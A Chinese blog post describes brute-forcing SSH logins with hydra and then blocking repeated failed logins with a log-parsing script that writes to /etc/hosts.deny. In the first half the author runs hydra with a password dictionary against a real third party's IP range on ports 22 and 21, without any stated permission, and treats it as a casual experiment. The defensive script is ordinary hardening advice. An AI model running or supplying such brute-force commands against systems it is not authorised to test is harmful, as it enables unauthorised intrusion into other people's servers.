攻击服务器后篇,hydra暴力破解ssh

你们应该看到我下图服务器被攻击的提示,今天就来说说如何攻击,我们又该如何防护:


前两次攻击是我自己攻击自己

剩下那些ip攻击,就属于恶意攻击。防人之心不可无。
先说说攻击模式如果你是Ubuntu系统直接就可以安装:
apt install hydra
就拿上面那些攻击我服务器ip来说吧(这里我不是恶意攻击只是举例):
首先我说过攻击服务器前篇你必须知道人家的ip地址+端口
ip:这块检测我还没想到怎么做
端口,攻击服务器前篇我说过了如图:


这个国外的服务器,开了3个端口,22,21,80

剩下就是攻击了,我尝试过用22端口对其暴力破解。
$hydra -l root -P 机房字典.txt -t 1 -vV -e ns 168.196.148.* ssh
给我的

我发现这个孩子是不是限制ip白名单,要fuck,不行我想是不是换端口搞他,我又切换端口21和用户 :
hydra -l admin -P 机房字典.txt -s 21 -t 1 -vV -e ns 168.196.148.* ssh


image.png

这搞得我怀疑人生,防护这么好,我太菜。。。。


image.png

其实hydra破解很强大,基本上包含了所有http协议
下面说说菜鸡防护介绍:
先查看异常登录次数:
cat /var/log/secure | awk '/Failed/{print $(NF-3)}' | sort -n| uniq -c| sort -rn


异常登录次数

加个脚本,我真实测试过报错和上面那个孩子服务器一样,限制ip访问了:

LogPath=/var/log/secure
LimitLine=20   #根据需求而定
[ ! -f $LogPath ] && { echo "Warning:$LogPath is not exist!" ; exit 1;}
for i in `cat $LogPath | awk '/Failed/{print $(NF-3)}' | sort -n| uniq -c| sort -rn| awk '{print $1":"$2}'`
do
  NUM=`echo $i | awk -F: '{print $1}'`
  IP=`echo $i | awk -F: '{print $2}'`
  if [ $NUM -gt $LimitLine ];then
    grep $IP /etc/hosts.deny > /dev/null
      if [ $? -gt 0 ];then
        echo sshd:$IP >> /etc/hosts.deny
      fi
  fi
done

查看限制ip有哪些;
$ cat /etc/hosts.deny


可以看到限制ip登录了

成功让我自己不能访问了
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容